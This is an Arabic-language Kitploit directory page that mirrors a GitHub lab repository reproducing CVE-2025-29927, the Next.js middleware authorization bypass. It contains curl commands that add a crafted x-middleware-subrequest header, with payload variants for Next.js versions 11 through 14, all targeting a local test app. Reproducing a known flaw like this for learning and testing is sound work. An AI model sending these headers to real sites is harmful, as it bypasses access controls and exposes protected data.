Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
vulnerable-nextjs-14-CVE-2025-29927 — vulnerable-nextjs-14-CVE-2025-29927 | Kitploit
أدوات/GitHubGitHub/sugib3o/vulnerable-nextjs-14-cve-2025-29927
المصادقة والترخيصتحليل الثغرات الأمنيةاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubsugib3o/vulnerable-nextjs-14-cve-2025-29927

vulnerable-nextjs-14-CVE-2025-29927

vulnerable-nextjs-14-CVE-2025-29927

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ 6 أشهرلم تتم المراجعة بعد

إعادة إنتاج تجاوز الترخيص CVE-2025-29927

هذا المستودع هو إعادة إنتاج لثغرة CVE-2025-29927 في حزمة next

كيفية إعادة الإنتاج

  1. اتبع الخطوات أدناه لاستنساخ التطبيق وتشغيله.
  2. اختبر أن الترخيص يمنع الوصول إلى نقطة النهاية /api/hello
root@kitploit:~
$ curl http://localhost:3000/api/hello

{"error":"Unauthorized"}%
  1. اختبر أن الترخيص يعمل عند تقديم الرمز
root@kitploit:~
$ curl -H "Authorization: my-jwt-token-here" http://localhost:3000/api/hello

{"message":"Hello World"}%
  1. يمكن أيضًا تجاوزه إذا قمنا بتداخل middleware 5 مرات في الرأس الخاص x-middleware-subrequest:
root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/api/hello

{"message":"Hello, World"}

استغلال CVE-2025-29927 لإصدارات Next.js الأقدم

كانت إصدارات Next.js 12 و 13 تستخدم اصطلاح تسمية مختلفًا لملف الوسيطة (_middleware.js)، والذي تم تغييره إلى middleware.js في Next.js 14. يمكن استغلال هذه الثغرة في الإصدارات الأقدم باستخدام ملف _middleware.js.

على سبيل المثال، ستنطبق الأحمال التالية، اعتمادًا على إصدار Next.js واصطلاح التوجيه الخاص بك:

  • curl -H "x-middleware-subrequest: middleware" http://localhost:3000/api/hello (لإصدارات Next.js 12.2 مع ملف middleware.js في جذر التطبيق، وليس داخل مجلد pages)
    • curl -H "x-middleware-subrequest: src/middleware" http://localhost:3000/api/hello
  • curl -H "x-middleware-subrequest: _middleware" http://localhost:3000/api/hello (لإصدارات Next.js 11 وحتى 12.2)
  • curl -H "x-middleware-subrequest: pages/_middleware" http://localhost:3000/api/hello
  • curl -H "x-middleware-subrequest: pages/admin/_middleware" http://localhost:3000/api/hello

البدء

أولاً، قم بتشغيل خادم التطوير:

root@kitploit:~
npm run dev
# or
yarn dev
# or
pnpm dev
# or
bun dev

افتح http://localhost:3000 في متصفحك لترى النتيجة.

يمكنك البدء في تحرير الصفحة عن طريق تعديل app/page.js. يتم تحديث الصفحة تلقائيًا عند تحرير الملف.

يستخدم هذا المشروع next/font لتحسين وتحميل Geist تلقائيًا، وهي عائلة خطوط جديدة لـ Vercel.

تعلم المزيد

لمعرفة المزيد عن Next.js، ألق نظرة على الموارد التالية:

  • وثائق Next.js - تعرف على ميزات Next.js وواجهة برمجة التطبيقات.
  • تعلم Next.js - برنامج تعليمي تفاعلي لـ Next.js.

يمكنك الاطلاع على مستودع Next.js على GitHub - ملاحظاتك ومساهماتك مرحب بها!

النشر على Vercel

أسهل طريقة لنشر تطبيق Next.js الخاص بك هي استخدام منصة Vercel من منشئي Next.js.

اطلع على وثائق نشر Next.js لمزيد من التفاصيل.

تنزيل الأداة